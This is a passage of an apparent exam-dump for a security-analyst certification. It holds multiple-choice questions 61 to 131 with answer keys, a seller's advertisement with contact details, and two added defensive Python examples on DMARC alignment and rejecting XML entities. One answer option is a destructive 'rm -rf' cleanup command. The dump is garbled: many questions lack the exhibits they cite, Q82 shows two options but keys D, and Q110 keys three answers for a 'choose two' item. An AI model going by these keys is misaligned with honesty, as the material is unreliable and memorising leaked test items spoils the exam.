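Checking the normalised result against the root, rather than searching the input for "../", is what makes the check survive encoding tricks and absolute paths; a blocklist on the literal string would miss both.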

QUESTION 61
Which of the following is the BEST way to gather patch information on a specific server?

A. Event Viewer
B. Custom script
C. SCAP software
D. CI/CD

Correct Answer: C

QUESTION 62
A security analyst reviews SIEM logs and discovers the following error event:

Which of the following environments does the analyst need to examine to continue troubleshooting the event?

A. Proxy server
B. SQL server
C. Windows domain controller
D. WAF appliance
E. DNS server

Correct Answer: E

QUESTION 63
A security analyst needs to develop a brief that will include the latest incidents and the attack phases of the incidents. The goal is to support threat
intelligence and identify whether or not the incidents are linked. Which of the following methods would be MOST appropriate to use?

A. The Cyber Kill Chain
B. The MITRE ATT&CK framework
C. An adversary capability model
D. The Diamond Model of Intrusion Analysis

Correct Answer: A

QUESTION 64
A security analyst is handling an incident in which ransomware has encrypted the disks of several company workstations. Which of the following would
work BEST to prevent this type of incident in the future?

A. Implement a UTM instead of a stateful firewall and enable gateway antivirus.
B. Back up the workstations to facilitate recovery and create a gold image.
C. Establish a ransomware awareness program and implement secure and verifiable backups.
D. Virtualize all the endpoints with daily snapshots of the virtual machines.

Correct Answer: C

QUESTION 65
A computer hardware manufacturer is developing a new SoC that will be used by mobile devices. The SoC should not allow users or the process to
downgrade from a newer firmware to an older one. Which of the following can the hardware manufacturer implement to prevent firmware downgrades?

A. Encryption
B. eFuse
C. Secure Enclave
D. Trusted execution

Correct Answer: B

QUESTION 66
An information security analyst on a threat-hunting team is working with administrators to create a hypothesis related to an internally developed web
application.
The working hypothesis is as follows:
Due to the nature of the industry, the application hosts sensitive data associated with many clients and is a significant target.
The platform is most likely vulnerable to poor patching and inadequate server hardening, which expose vulnerable services.
The application is likely to be targeted with SQL injection attacks due to the large number of reporting capabilities within the application. As a result, the
systems administrator upgrades outdated service applications and validates the endpoint configuration against an industry benchmark. The analyst
suggests developers receive additional training on implementing identity and access management, and also implements a WAF to protect against SQL
injection attacks. Which of the following BEST represents the technique in use?

A. Improving detection capabilities
B. Bundling critical assets
C. Profiling threat actors and activities
D. Reducing the attack surface area

Correct Answer: D

QUESTION 67
A security analyst is scanning the network to determine if a critical security patch was applied to all systems in an enterprise. The organization has a very
low tolerance for risk when it comes to resource availability. Which of the following is the BEST approach for configuring and scheduling the scan?

A. Make sure the scan is credentialed, covers all hosts in the patch management system, and is scheduled during business hours so it can be
terminated if it affects business operations.
B. Make sure the scan is uncredentialed, covers all hosts in the patch management system, and is scheduled during off-business hours so it has the
least impact on operations.
C. Make sure the scan is credentialed, has the latest software and signature versions, covers all external hosts in the patch management system, and
is scheduled during off-business hours so it has the least impact on operations.

Get Latest & Actual Exam's Question and Answers from © Homer CO., LTD. We cover ALL Cisco and Non-Cisco Exam Dumps.
Cisco Written & CCIE LAB Dump, AWS, Azure, Oracle, Huawei, Aruba, Fortinet, F5 101 & F5 201, RedHat Linux, Comptia, CEHv11, Palo Alto, Check Point, EC Council and many more.
CCIEHOMER "We make sale ONLY if the dump is stable" Contact us: cciehomer@gmail.com Whatsapp +1-302-440-1843 homerwilliams@cciehomer.com
CCIEHOMER We provide Pratice Test's in PDF and VCE format. FREE VCE PLAYER

D. Make sure the scan is credentialed, uses a limited plug-in set, scans all host IP addresses in the enterprise, and is scheduled during off-business
hours so it has the least impact on operations.

Correct Answer: D

QUESTION 68
A security analyst is looking at the headers of a few emails that appear to be targeting all users at an organization:

Which of the following technologies would MOST likely be used to prevent this phishing attempt?

A. DNSSEC
B. DMARC
C. STP
D. S/IMAP

Correct Answer: B
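
Added example, not part of the original question set, serving both Q37 (which header is inconsistent with the rest) and Q68 (why DMARC stops the phishing attempt): it pulls the From, Return-Path and Authentication-Results identities out of a message and applies DMARC identifier alignment to them. The two messages are constructed, the receiving server's policy values are passed in as assumptions, and the organisational domain is approximated as the last two labels because no public-suffix list is available offline.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed phishing message: From claims corp.example.com, but the envelope sender,
# the SPF-checked domain and the DKIM signing domain all belong to mail-blast.example.net.
CONSTRUCTED_PHISH = """\
Return-Path: <bounce@mail-blast.example.net>
Received: from mx.mail-blast.example.net (mx.mail-blast.example.net [198.51.100.20]) by mail.corp.example.com with ESMTPS (TLS1.2, ECDHE-RSA-AES256-GCM-SHA384); Tue, 14 Mar 2023 09:12:31 +0000
Authentication-Results: mail.corp.example.com; spf=pass smtp.mailfrom=mail-blast.example.net; dkim=pass header.d=mail-blast.example.net
From: "IT Helpdesk" <helpdesk@corp.example.com>
To: all-staff@corp.example.com
Subject: Action required: your password expires today

Please renew your password using the link below.
"""

# Constructed legitimate message for comparison: every identity is corp.example.com.
CONSTRUCTED_LEGIT = """\
Return-Path: <helpdesk@corp.example.com>
Authentication-Results: mail.corp.example.com; spf=pass smtp.mailfrom=corp.example.com; dkim=pass header.d=corp.example.com
From: "IT Helpdesk" <helpdesk@corp.example.com>
To: all-staff@corp.example.com
Subject: Scheduled maintenance

Mail will be unavailable on Saturday from 02:00 to 04:00.
"""


def org_domain(domain):
    """Organisational domain, approximated as the last two labels (assumption: no PSL)."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(from_domain, auth_domain, mode):
    """DMARC alignment: strict ('s') needs an exact match, relaxed ('r') an org-domain match."""
    if not auth_domain:
        return False
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)


def header_identities(raw):
    """Extract the From domain, Return-Path domain and the SPF/DKIM results and domains."""
    msg = message_from_string(raw)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2]
    return_path = parseaddr(msg.get("Return-Path", ""))[1].rpartition("@")[2]
    results = msg.get("Authentication-Results", "")
    spf = re.search(r"spf=(\w+)\s+smtp\.mailfrom=([\w.-]+)", results)
    dkim = re.search(r"dkim=(\w+)\s+header\.d=([\w.-]+)", results)
    return {
        "from": from_domain,
        "return_path": return_path,
        "spf": (spf.group(1), spf.group(2)) if spf else ("none", ""),
        "dkim": (dkim.group(1), dkim.group(2)) if dkim else ("none", ""),
    }


def dmarc_evaluate(raw, policy="reject", adkim="r", aspf="r"):
    """Apply the From-domain owner's (assumed) DMARC policy to the message's results."""
    ids = header_identities(raw)
    spf_ok = ids["spf"][0] == "pass" and aligned(ids["from"], ids["spf"][1], aspf)
    dkim_ok = ids["dkim"][0] == "pass" and aligned(ids["from"], ids["dkim"][1], adkim)
    passed = spf_ok or dkim_ok
    return {
        "from_domain": ids["from"],
        "return_path_mismatch": org_domain(ids["return_path"]) != org_domain(ids["from"]),
        "spf_aligned": spf_ok,
        "dkim_aligned": dkim_ok,
        "dmarc": "pass" if passed else "fail",
        "disposition": "none" if passed else policy,
    }


if __name__ == "__main__":
    print(dmarc_evaluate(CONSTRUCTED_PHISH))
    print(dmarc_evaluate(CONSTRUCTED_LEGIT))
```

The phishing message passes SPF and DKIM for the domain that actually sent it, which is why those checks alone do not stop it; DMARC fails because neither authenticated domain aligns with the From header the recipient sees, and the From-domain owner's p=reject policy is what tells the receiver to drop it. The TLS cipher in the Received line is just the transport and says nothing about who sent the mail.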

QUESTION 69
A developer downloaded and attempted to install a file transfer application in which the installation package is bundled with adware. The next-generation
antivirus software prevented the file from executing, but it did not remove the file from the device. Over the next few days, more developers tried to
download and execute the offending file. Which of the following changes should be made to the security tools to BEST remedy the issue?

A. Blacklist the hash in the next-generation antivirus system.
B. Manually delete the file from each of the workstations.
C. Remove administrative rights from all developer workstations.
D. Block the download of the file via the web proxy.

Correct Answer: D

QUESTION 70
A newly appointed Chief Information Security Officer has completed a risk assessment review of the organization and wants to reduce the numerous
risks that were identified. Which of the following will provide a trend of risk mitigation?

A. Planning
B. Continuous monitoring
C. Risk response
D. Risk analysis
E. Oversight

Correct Answer: C

QUESTION 71
Which of the following allows Secure Boot to be enabled?

A. eFuse
B. UEFI
C. HSM
D. PAM

Correct Answer: B

QUESTION 72
A company stores all of its data in the cloud. All company-owned laptops are currently unmanaged, and all users have administrative rights. The security
team is having difficulty identifying a way to secure the environment. Which of the following would be the BEST method to protect the company's data?

A. Implement UEM on all systems and deploy security software.
B. Implement DLP on all workstations and block company data from being sent outside the company.
C. Implement a CASB and prevent certain types of data from being downloaded to a workstation.
D. Implement centralized monitoring and logging for all company systems.

Correct Answer: C

QUESTION 73
A security analyst is reviewing a vulnerability scan report and notes the following finding:

As part of the detection and analysis procedures, which of the following should the analyst do NEXT?

A. Patch or reimage the device to complete the recovery.
B. Restart the antivirus's running processes.
C. Isolate the host from the network to prevent exposure.
D. Confirm the workstation's signatures against the most current signatures.

Correct Answer: D

QUESTION 74
After a remote command execution incident occurred on a web server, a security analyst found the following piece of code in an XML file:

Which of the following is the BEST solution to mitigate this type of attack?

A. Implement a better level of user input filters and content sanitization.
B. Properly configure XML handlers so they do not process &ent parameters coming from user inputs.
C. Use parameterized queries to avoid user inputs from being processed by the server.
D. Escape user inputs using character encoding conjoined with whitelisting.

Correct Answer: B
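
Added example, not part of the original question set: the parser behaviour behind Q74 shown side by side, a default ElementTree parse that expands an entity declared in the document's DTD, and a hardened parse that refuses any DOCTYPE, entity declaration or external entity reference before the document reaches the XML handler. The XML inputs are constructed; the entity name ent is taken from the question, its value is invented. In production the same pre-scan is what the defusedxml library packages up.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

# Constructed input: the DTD declares an entity and the body references it.
CONSTRUCTED_XXE = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE data [<!ENTITY ent "expanded-by-the-parser">]>'
    b"<data><item>&ent;</item></data>"
)
CONSTRUCTED_CLEAN = b'<?xml version="1.0"?><data><item>plain text</item></data>'


class UnsafeXML(ValueError):
    """Raised when untrusted XML carries a DTD, entity declaration or external reference."""


def parse_unhardened(xml_bytes):
    """Default ElementTree parsing: general entities declared in the DTD are expanded."""
    return ET.fromstring(xml_bytes)


def reject_dtd_and_entities(xml_bytes):
    """Pre-scan with expat and refuse the document at the first DTD-related construct."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {name!r} not allowed in untrusted input")

    def on_entity_decl(*_):
        raise UnsafeXML("entity declaration not allowed in untrusted input")

    def on_external_ref(*_):
        raise UnsafeXML("external entity reference not allowed in untrusted input")

    # Exceptions raised inside expat handlers propagate out of Parse().
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(xml_bytes, True)


def parse_hardened(xml_bytes):
    """Parse only after the pre-scan has confirmed there is nothing for the handler to expand."""
    reject_dtd_and_entities(xml_bytes)
    return ET.fromstring(xml_bytes)


def item_text(parse, xml_bytes):
    """What the application would receive from <item>, or the rejection reason."""
    try:
        root = parse(xml_bytes)
    except UnsafeXML as exc:
        return f"rejected: {exc}"
    return root.findtext("item")


if __name__ == "__main__":
    print(item_text(parse_unhardened, CONSTRUCTED_XXE))  # expanded-by-the-parser
    print(item_text(parse_hardened, CONSTRUCTED_XXE))    # rejected: DOCTYPE 'data' not allowed in untrusted input
    print(item_text(parse_hardened, CONSTRUCTED_CLEAN))  # plain text
```

Refusing the DTD outright is simpler and safer than trying to filter entity names out of user input: an internal entity can be used for expansion attacks, an external one (SYSTEM "file:///...") for reading server files, and a parameter entity for out-of-band exfiltration, and all three require a DOCTYPE that a data-exchange document never needs.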

QUESTION 75
A security analyst is generating a list of recommendations for the company's insecure API. Which of the following is the BEST parameter mitigation recommendation?

A. Use TLS for all data exchanges.
B. Use effective authentication and authorization methods.
C. Implement parameterized queries.
D. Validate all incoming data.

Correct Answer: B

QUESTION 76
A company recently experienced a breach of sensitive information that affects customers across multiple geographical regions. Which of the following
roles would be BEST suited to determine the breach notification requirements?

A. Legal counsel
B. Chief Security Officer
C. Human resources
D. Law enforcement

Correct Answer: A

QUESTION 77
A security analyst identified some potentially malicious processes after capturing the contents of memory from a machine during incident response.
Which of the following procedures is the NEXT step for further investigation?

A. Data carving
B. Timeline construction
C. File cloning
D. Reverse engineering

Correct Answer: D

QUESTION 78
Understanding attack vectors and integrating intelligence sources are important components
of:

A. a vulnerability management plan.
B. proactive threat hunting.
C. risk management compliance.
D. an incident response plan.

Correct Answer: B

QUESTION 79
A business recently acquired a software company. The software company's security posture is unknown. However, based on an initial assessment,
there are limited security controls. No significant security monitoring exists. Which of the following is the NEXT step that should be completed to obtain
information about the software company's security posture?

A. Develop an asset inventory to determine the systems within the software company.
B. Review relevant network drawings, diagrams, and documentation.
C. Perform penetration tests against the software company's internal and external networks.
D. Baseline the software company's network to determine the ports and protocols in use.

Correct Answer: A

QUESTION 80
A security analyst identified one server that was compromised and used as a data mining machine, and a clone of the hard drive that was created.
Which of the following will MOST likely provide information about when and how the machine was compromised and where the malware is located?

A. System timeline reconstruction
B. System registry extraction
C. Data carving
D. Volatile memory analysis

Correct Answer: A

QUESTION 81
A security analyst is researching ways to improve the security of a company's email system to mitigate emails that are impersonating company
executives. Which of the following would be BEST for the analyst to configure to achieve this objective?

A. A TXT record on the name server for SPF
B. DNSSEC keys to secure replication
C. Domain Keys Identified Mail
D. A sandbox to check incoming mail

Correct Answer: C

QUESTION 82
During an investigation, a security analyst determines suspicious activity occurred during the night shift over the weekend. Further investigation reveals
the activity was initiated from an internal IP going to an external website. Which of the following would be the MOST appropriate recommendation to
prevent similar activity from happening in the future?

A. An IPS signature modification for the specific IP addresses
B. An IDS signature modification for the specific IP addresses

Correct Answer: D

QUESTION 83
A company frequently experiences issues with credential stuffing attacks. Which of the following is the BEST control to help prevent these attacks from
being successful?

A. SIEM
B. IDS
C. MFA
D. TLS

Correct Answer: C

QUESTION 84
Company A is in the process of merging with Company B. As part of the merger, connectivity between the ERP systems must be established so
pertinent financial information can be shared between the two entities. Which of the following will establish a more automated approach to secure data
transfers between the two entities?

A. Set up an FTP server that both companies can access and export the required financial data to a folder.
B. Set up a VPN between Company A and Company B, granting access only to the ERPs within the connection.
C. Set up a PKI between Company A and Company B and intermediate shared certificates between the two entities.
D. Create static NATs on each entity's firewalls that map to the ERP systems and use native ERP authentication to allow access.

Correct Answer: B

QUESTION 85
After an incident involving a phishing email, a security analyst reviews the following email access log:

Based on this information, which of the following accounts was MOST likely compromised?

A. CARLB
B. CINDYP
C. GILLIANO
D. ANDREAD
E. LAURAB

Correct Answer: D

QUESTION 86
An organization wants to ensure the privacy of the data that is on its systems. Full disk encryption and DLP are already in use. Which of the following is
the BEST option?

A. Require all remote employees to sign an NDA.
B. Enforce geofencing to limit data accessibility.
C. Require users to change their passwords more frequently.
D. Update the AUP to restrict data sharing.

Correct Answer: B

QUESTION 87
An organization has specific technical risk mitigation configurations that must be implemented before a new server can be approved for production.
Several critical servers were recently deployed with the antivirus missing, unnecessary ports disabled, and insufficient password complexity. Which of
the following should the analyst recommend to prevent a recurrence of this risk exposure?

A. Perform password-cracking attempts on all devices going into production
B. Perform an Nmap scan on all devices before they are released to production
C. Perform antivirus scans on all devices before they are approved for production
D. Perform automated security controls testing of expected configurations prior to production

Correct Answer: D

QUESTION 88
Which of the following attack techniques has the GREATEST likelihood of quick success against Modbus assets?

A. Remote code execution
B. Buffer overflow
C. Unauthenticated commands
D. Certificate spoofing

Correct Answer: C

QUESTION 89
A company's Chief Information Officer wants to use a CASB solution to ensure policies are being met during cloud access. Due to the nature of the
company's business and risk appetite, the management team elected to not store financial information in the cloud. A security analyst needs to
recommend a solution to mitigate the threat of financial data leakage into the cloud. Which of the following should the analyst recommend?

A. Utilize the CASB to enforce DLP data-at-rest protection for financial information that is stored on premises.
B. Do not utilize the CASB solution for this purpose, but add DLP on premises for data in motion.
C. Utilize the CASB to enforce DLP data-in-motion protection for financial information moving to the cloud.
D. Do not utilize the CASB solution for this purpose, but add DLP on premises for data at rest.

Correct Answer: C

QUESTION 90
A security administrator needs to provide access from partners to an isolated laboratory network inside an organization that meets the following
requirements:
* The partners' PCs must not connect directly to the laboratory network
* The tools the partners need to access while on the laboratory network must be available to all partners
* The partners must be able to run analyses on the laboratory network, which may take hours to complete
Which of the following capabilities will MOST likely meet the security objectives of the request?

A. Deployment of a jump box to allow access to the laboratory network and use of VDI in persistent mode to provide the necessary tools for analysis
B. Deployment of a firewall to allow access to the laboratory network and use of VDI in non-persistent mode to provide the necessary tools for analysis
C. Deployment of a firewall to allow access to the laboratory network and use of VDI in persistent mode to provide the necessary tools for analysis
D. Deployment of a jump box to allow access to the laboratory network and use of VDI in non-persistent mode to provide the necessary tools for
analysis

Correct Answer: A

QUESTION 91
The incident response team is working with a third-party forensic specialist to investigate the root cause of a recent intrusion. An analyst was asked to
submit sensitive network design details for review. The forensic specialist recommended electronic delivery for efficiency, but email was not an approved
communication channel to send network details. Which of the following BEST explains the importance of using a secure method of communication
during incident response?

A. To prevent adversaries from intercepting response and recovery details
B. To ensure intellectual property remains on company servers
C. To have a backup plan in case email access is disabled
D. To ensure the management team has access to all the details that are being exchanged

Correct Answer: A

QUESTION 92
According to a static analysis report for a web application, a dynamic code evaluation script injection vulnerability was found. Which of the following
actions is the BEST option to fix the vulnerability in the source code?

A. Delete the vulnerable section of the code immediately.
B. Create a custom rule on the web application firewall.
C. Validate user input before execution and interpretation.
D. Use parameterized queries.

Correct Answer: C

QUESTION 93
A security analyst has discovered malware is spreading across multiple critical systems and is originating from a single workstation, which belongs to a
member of the cyberinfrastructure team who has legitimate administrator credentials. An analysis of the traffic indicates the workstation swept the
network looking for vulnerable hosts to infect. Which of the following would have worked BEST to prevent the spread of this infection?

A. Vulnerability scans of the network and proper patching
B. A properly configured and updated EDR solution
C. A honeynet used to catalog the anomalous behavior and update the IPS
D. Logical network segmentation and the use of jump boxes

Correct Answer: D

QUESTION 94
Which of the following BEST identifies the appropriate use of threat intelligence as a function of detection and response?

A. To identify weaknesses in an organization's security posture
B. To identify likely attack scenarios within an organization
C. To build a business continuity plan for an organization
D. To build a network segmentation strategy

Correct Answer: B

QUESTION 95
A security analyst on the threat-hunting team has developed a list of unneeded, benign services that are currently running as part of the standard OS
deployment for workstations. The analyst will provide this list to the operations team to create a policy that will automatically disable the services for all
workstations in the organization. Which of the following BEST describes the security analyst's goal?

A. To create a system baseline
B. To reduce the attack surface
C. To optimize system performance
D. To improve malware detection

Correct Answer: B

QUESTION 96
A cybersecurity analyst is supporting an incident response effort via threat intelligence. Which of the following is the analyst MOST likely executing?

A. Requirements analysis and collection planning
B. Containment and eradication
C. Recovery and post-incident review
D. Indicator enrichment and research pivoting

Correct Answer: D

QUESTION 97
A security analyst has received reports of very slow, intermittent access to a public-facing corporate server. Suspecting the system may be
compromised, the analyst runs the following commands:

Based on the output from the above commands, which of the following should the analyst do NEXT to further the investigation?

A. Run crontab -r; rm -rf /tmp/.t to remove and disable the malware on the system.
B. Examine the server logs for further indicators of compromise of a web application.
C. Run kill -9 1325 to bring the load average down so the server is usable again.
D. Perform a binary analysis on the /tmp/.t/t file, as it is likely to be a rogue SSHD server.

Correct Answer: B

QUESTION 98
An analyst receives an alert from the continuous-monitoring solution about unauthorized changes to the firmware versions on several field devices. The
asset owners confirm that no firmware version updates were performed by authorized technicians, and customers have not reported any performance
issues or outages.
Which of the following actions would be BEST for the analyst to recommend to the asset owners to secure the devices from further exploitation?

A. Change the passwords on the devices.
B. Implement BIOS passwords.
C. Remove the assets from the production network for analysis.
D. Report the findings to the threat intel community.

Correct Answer: C

QUESTION 99
An organization has not had an incident for several months. The Chief Information Security Officer wants to move to a more proactive stance for security
investigations. Which of the following would BEST meet that goal?

A. Root-cause analysis
B. Active response
C. Advanced antivirus
D. Information-sharing community
E. Threat hunting

Correct Answer: E

QUESTION 100
Massivelog.log has grown to 40GB on a Windows server. At this size, local tools are unable to read the file, and it cannot be moved off the virtual server
where it is located. Which of the following lines of PowerShell script will allow a user to extract the last 10,000 lines of the log for review?

A. tail -10000 Massivelog.log > extract.txt
B. info tail n -10000 Massivelog.log | extract.txt;
C. get content './Massivelog.log' -Last 10000 | extract.txt
D. get-content './Massivelog.log' -Last 10000 > extract.txt;

Correct Answer: D

QUESTION 101
A cybersecurity analyst is establishing a threat-hunting and intelligence group at a growing organization. Which of the following is a collaborative
resource that would MOST likely be used for this purpose?

A. IoC feeds
B. CVSS scores
C. Scrum
D. ISAC

Correct Answer: D

QUESTION 102
Which of the following are considered PII by themselves? (Choose two.)

A. Government ID
B. Job title
C. Employment start date
D. Birth certificate
E. Employer address
F. Mother's maiden name

Correct Answer: AD

QUESTION 103
A security analyst needs to provide the development team with secure connectivity from the corporate network to a three-tier cloud environment. The
developers require access to servers in all three tiers in order to perform various configuration tasks. Which of the following technologies should the
analyst implement to provide secure transport?

A. CASB
B. VPC
C. Federation
D. VPN

Correct Answer: D

QUESTION 104
A security analyst reviews a recent network capture and notices encrypted inbound traffic on TCP port 465 was coming into the company's network from
a database server. Which of the following will the security analyst MOST likely identify as the reason for the traffic on this port?

A. The server is configured to communicate on the secure database standard listener port.
B. Someone has configured an unauthorized SMTP application over SSL.
C. A connection from the database to the web front end is communicating on the port.
D. The server is receiving a secure connection using the new TLS 1.3 standard.

Correct Answer: B

QUESTION 105
A security analyst reviews the following aggregated output from an Nmap scan and the border firewall ACL:

Which of the following should the analyst reconfigure to BEST reduce organizational risk while maintaining current functionality?

A. PC1
B. PC2
C. Server1
D. Server2
E. Firewall

Correct Answer: E

QUESTION 106
The help desk is having difficulty keeping up with all onboarding and offboarding requests. Managers often submit requests for new users at the last
minute, causing the help desk to scramble to create accounts across many different interconnected systems. Which of the following solutions would
work BEST to assist the help desk with the onboarding and offboarding process while protecting the company's assets?

A. MFA
B. CASB
C. SSO
D. RBAC

Correct Answer: D

QUESTION 107
Which of the following is MOST important when developing a threat hunting program?

A. Understanding penetration testing techniques
B. Understanding how to build correlation rules within a SIEM
C. Understanding security software technologies
D. Understanding assets and categories of assets

Correct Answer: D

QUESTION 108
A cybersecurity analyst needs to rearchitect the network using a firewall and a VPN server to achieve the highest level of security. To BEST complete
this task, the analyst should place the:

A. firewall behind the VPN server.
B. VPN server parallel to the firewall.
C. VPN server behind the firewall.
D. VPN on the firewall.

Correct Answer: C

QUESTION 109
An executive assistant wants to onboard a new cloud-based product to help with business analytics and dashboarding. Which of the following would be
the BEST integration option for this service?

A. Manually log in to the service and upload data files on a regular basis.
B. Have the internal development team script connectivity and file transfers to the new service.
C. Create a dedicated SFTP site and schedule transfers to ensure file transport security.
D. Utilize the cloud product's API for supported and ongoing integrations.

Correct Answer: D

QUESTION 110
An information security analyst discovered a virtual machine server was compromised by an attacker. Which of the following should be the FIRST steps
to confirm and respond to the incident? (Choose two.)

A. Pause the virtual machine.
B. Shut down the virtual machine.
C. Take a snapshot of the virtual machine.
D. Remove the NIC from the virtual machine.
E. Review host hypervisor log of the virtual machine.
F. Execute a migration of the virtual machine.

Correct Answer: ACD

QUESTION 111
The security team decides to meet informally to discuss and test their response plan for potential security breaches and emergency situations. Which of
the following types of training will the security team perform?

A. Tabletop exercise
B. Red-team attack
C. System assessment implementation
D. Blue-team training
E. White-team engagement

Correct Answer: A

QUESTION 112
Which of the following BEST explains the function of TPM?

A. To provide hardware-based security features using unique keys
B. To ensure platform confidentiality by storing security measurements
C. To improve management of the OS installations
D. To implement encryption algorithms for hard drives

Correct Answer: A

QUESTION 113
A security analyst is investigating an incident related to an alert from the threat detection platform on a host (10.0.1.25) in a staging environment that
could be running a cryptomining tool because it is sending traffic to an IP address that is related to Bitcoin. The network rules for the instance are the
following:

Which of the following is the BEST way to isolate and triage the host?

A. Remove rules 1, 2, and 3.
B. Remove rules 1, 2, 4, and 5.
C. Remove rules 1, 2, 3, 4, and 5.
D. Remove rules 1, 2, and 5.
E. Remove rules 1, 4, and 5.
F. Remove rules 4 and 5.

Correct Answer: D

QUESTION 114
Which of the following BEST describes what an organization's incident response plan should cover regarding how the organization handles public or
private disclosures of an incident?

A. The disclosure section should focus on how to reduce the likelihood customers will leave due to the incident.
B. The disclosure section should contain the organization's legal and regulatory requirements regarding disclosures.
C. The disclosure section should include the names and contact information of key employees who are needed for incident resolution.
D. The disclosure section should contain language explaining how the organization will reduce the likelihood of the incident from happening in the
future.

Correct Answer: B

QUESTION 115
An organization has the following policy statements:
All emails entering or leaving the organization will be subject to inspection for malware, policy violations, and unauthorized content.
All network activity will be logged and monitored.
Confidential data will be tagged and tracked.
Confidential data must never be transmitted in an unencrypted form.
Confidential data must never be stored on an unencrypted mobile device.
Which of the following is the organization enforcing?

A. Acceptable use policy
B. Data privacy policy
C. Encryption policy
D. Data management policy

Correct Answer: D

QUESTION 116
An organization has the following risk mitigation policies:
Risks without compensating controls will be mitigated first if the risk value is greater than $50,000.
Other risk mitigation will be prioritized based on risk value.
The following risks have been identified:

Which of the following is the order of priority for risk mitigation from highest to lowest?

A. A, C, D, B
B. B, C, D, A
C. C, B, A, D
D. C, D, A, B
E. D, C, B, A

Correct Answer: C

QUESTION 117
After examining a header and footer file, a security analyst begins reconstructing files by scanning the raw data bytes of a hard disk and rebuilding them.
Which of the following techniques is the analyst using?

A. Header analysis
B. File carving
C. Metadata analysis
D. Data recovery

Correct Answer: B

QUESTION 118
In SIEM software, a security analyst detected some changes to hash signatures from monitored files during the night followed by SMB brute-force
attacks against the file servers. Based on this behavior, which of the following actions should be taken FIRST to prevent a more serious compromise?

A. Fully segregate the affected servers physically in a network segment, apart from the production network.
B. Collect the network traffic during the day to understand if the same activity is also occurring during business hours.
C. Check the hash signatures, comparing them with malware databases to verify if the files are infected.
D. Collect all the files that have changed and compare them with the previous baseline.

Correct Answer: A

QUESTION 119
While monitoring the information security notification mailbox, a security analyst notices several emails were reported as spam. Which of the following
should the analyst do FIRST?

A. Block the sender in the email gateway.
B. Delete the email from the company's email servers.
C. Ask the sender to stop sending messages.
D. Review the message in a secure environment.

Correct Answer: D

QUESTION 120
While implementing a PKI for a company, a security analyst plans to utilize a dedicated server as the certificate authority that is only used to sign
intermediate certificates. Which of the following are the MOST secure states for the certificate authority server when it is not in use? (Choose two.)

A. On a private VLAN
B. Full disk encrypted
C. Powered off
D. Backed up hourly
E. VPN accessible only
F. Air gapped

Correct Answer: CF

QUESTION 121
While conducting a cloud assessment, a security analyst performs a Prowler scan, which generates the following within the report:

Based on the Prowler report, which of the following is the BEST recommendation?

A. Delete CloudDev access key 1.
B. Delete BusinessUsr access key 1.
C. Delete access key 1.
D. Delete access key 2.

Correct Answer: B

QUESTION 122
After receiving reports of high latency, a security analyst performs an Nmap scan and observes the following output:

Which of the following suggests the system that produced this output was compromised?

A. Secure shell is operating on a non-standard port.
B. There are no indicators of compromise on this system.
C. MySQL service is identified on a standard PostgreSQL port.
D. Standard HTTP is open on the system and should be closed.

Correct Answer: A

QUESTION 123
An organization prohibits users from logging in to the administrator account. If a user requires elevated permissions, the user's account should be part of
an administrator group, and the user should escalate permission only as needed and on a temporary basis. The organization has the following reporting
priorities when reviewing system activity:
Successful administrator login reporting priority – high
Failed administrator login reporting priority – medium
Failed temporary elevated permissions – low
Successful temporary elevated permissions – non-reportable
A security analyst is reviewing server syslogs and sees the following:

Which of the following events is the HIGHEST reporting priority?

A. <100>2 2020-01-10T20:36:01.010Z financeserver sudo 201 32001 - BOM 'sudo vi users.txt' success
B. <100>2 2020-01-10T21:18:34.002Z adminserver sudo 201 32001 - BOM 'sudo more /etc/passwords' success
C. <100>2 2020-01-10T19:33:48.002Z webserver su 201 32001 - BOM 'su' success
D. <100>2 2020-01-10T21:53:11.002Z financeserver su 201 32001 - BOM 'su vi syslog.conf failed for joe

Correct Answer: C

QUESTION 124
An incident response team detected malicious software that could have gained access to credit card data. The incident response team was able to
mitigate significant damage and implement corrective actions. By having incident response mechanisms in place, which of the following should be
notified for lessons learned?

A. The human resources department
B. Customers
C. Company leadership
D. The legal team

Correct Answer: C

QUESTION 125
When investigating a report of a system compromise, a security analyst views the following /var/log/secure log file:

Which of the following can the analyst conclude from viewing the log file?

A. The comptia user knows the sudo password.
B. The comptia user executed the sudo su command.
C. The comptia user knows the root password.
D. The comptia user added himself or herself to the /etc/sudoers file.

Correct Answer: C

QUESTION 126
A security analyst is reviewing the following server statistics:

Which of the following is MOST likely occurring?

A. Race condition
B. Privilege escalation
C. Resource exhaustion
D. VM escape

Correct Answer: C

QUESTION 127
A company has started planning the implementation of a vulnerability management procedure. However, its security maturity level is low, so there are
some prerequisites to complete before risk calculation and prioritization. Which of the following should be completed FIRST?

A. A business impact analysis
B. A system assessment
C. Communication of the risk factors
D. A risk identification process

Correct Answer: B

QUESTION 128
An organization is experiencing security incidents in which a systems administrator is creating unauthorized user accounts. A security analyst has
created a script to snapshot the system configuration each day. Following is one of the scripts: cat /etc/passwd > daily_$(date +"%m_%d_%Y")
This script has been running successfully every day. Which of the following commands would provide the analyst with additional useful information
relevant to the above script?

A. diff daily_11_03_2019 daily_11_04_2019
B. ps -ef | grep admin > daily_process_$(date +"%m_%d_%Y")
C. more /etc/passwd > daily_$(date +"%m_%d_%Y_%H:%M:%S")
D. ls -lai /usr/sbin > daily_applications

Correct Answer: A

QUESTION 129
A routine vulnerability scan detected a known vulnerability in a critical enterprise web application. Which of the following would be the BEST next step?

A. Submit a change request to have the system patched.
B. Evaluate the risk and criticality to determine if further action is necessary.
C. Notify a manager of the breach and initiate emergency procedures.
D. Remove the application from production and inform the users.

Correct Answer: B

QUESTION 130
A manufacturing company uses a third-party service provider for Tier 1 security support. One of the requirements is that the provider must only source
talent from its own country due to geopolitical and national security interests. Which of the following can the manufacturing company implement to
ensure the third-party service provider meets this requirement?

A. Implement a secure supply chain program with governance.
B. Implement blacklisting for IP addresses from outside the country.
C. Implement strong authentication controls for all contractors.
D. Implement user behavior analytics for key staff members.

Correct Answer: A

QUESTION 131
